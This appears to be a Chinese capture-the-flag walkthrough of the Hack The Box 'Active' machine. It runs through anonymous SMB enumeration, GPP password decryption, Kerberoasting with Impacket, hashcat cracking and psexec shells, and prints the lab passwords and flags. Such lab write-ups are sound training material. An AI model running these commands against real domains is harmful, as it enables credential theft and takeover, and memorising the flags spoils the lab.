靶场IP:10.129.220.218
Kerberos在88,netbios-ssn在139,ldap在389和3268。
先从SMB下手使用-L命令列出共享文件夹
带美元符号的是管理员权限,这里我们使用-N符号连接NETLOGON
smbclient -N \\\\10.129.220.218\\NETLOGON
连接Replication
smbclient -N \\\\10.129.220.218\\Replication
发现active.htb文件夹
在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
下发现文件
get下载GPT.INI
在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\下发现文件
在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\下发现文件
在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\下发现文件
所有发现的文件
在Groups.xml找到了账号和加密的密码
加密的密码cpassword就是组策略密码GPP
利用gpp-decrypt来进行解密
获得密码
GPPstillStandingStrong2k18
使用 SVC_TGS GPPstillStandingStrong2k18 登录SMB
smbclient //10.129.220.218/Users -U SVC_TGS
获取普通用户flag
da252c6fb524db2879c997ad6a0b8a17
从Github下载并安装impacket以使用其python类GetUserSPN.py
10.129.220.218 active.htb 添加到HOSTS中
执行命令
python /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.220.218 active.htb/SVC_TGS:GPPstillStandingStrong2k18
使用GetUserSPNs.py Impacket 中的脚本来获取与普通用户帐户关联的服务用户名列表。它还会得到一张可以破解的票。
该脚本识别了一个用户:
Administrator
将hash写入文件
使用hashcat爆破
使用hachcat 确认tgs票据的哈希模式
hashcat -h |grep -i tgs
hashcat -m 13100 -a 0 ./hash.txt ~/Desktop/dic/rockyou.txt --force --show
获得 Administrator 的密码 Ticketmaster1968
getshell
①psexec.py
python /usr/share/doc/python3-impacket/examples/psexec.py administrator@active.htb
获得管理员flag
88fee55365b004ce2a908cde877f7110
②MSF 使用 exploit/windows/smb/psexec 模块